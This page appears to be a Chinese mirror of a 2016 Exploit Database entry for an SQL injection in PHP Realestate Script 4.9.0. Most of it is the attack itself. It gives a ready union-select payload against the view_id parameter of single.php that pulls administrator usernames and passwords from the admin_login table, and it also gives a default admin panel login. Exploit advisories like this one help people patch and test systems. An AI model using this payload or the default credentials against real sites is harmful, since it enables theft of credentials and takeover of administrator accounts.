PHP Realestate Script Script 4.9.0 – SQL Injection

• Exploit Database
• 127 阅读

• 作者： Meisam Monsef
  日期： 2016-05-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39864/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

  # Exploit Title: Property Agent RealeState Script Sql Injection # Date: 2015-05-27 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com # Vendor Homepage: <blockquote class="wp-embedded-content" data-secret="lsR9vhZ3cc"><a href="https://phpscriptsmall.com/product/php-realestate-script/" target="_blank"rel="external nofollow" class="external" >Real Estate Listing Script</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Real Estate Listing Script” — PHP Scripts Mall" src="https://phpscriptsmall.com/product/php-realestate-script/embed/#?secret=lsR9vhZ3cc" data-secret="lsR9vhZ3cc" frameborder="0" marginmarginscrolling="no"></iframe> # Version: 4.9.0   Exploit : http://server/[path]/single.php?view_id=-99999+[SQl+Command]   Test : http://server/single.php?view_id=-57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin_login   Admin Panel : http://server/admin/ Username : admin Password : inetsol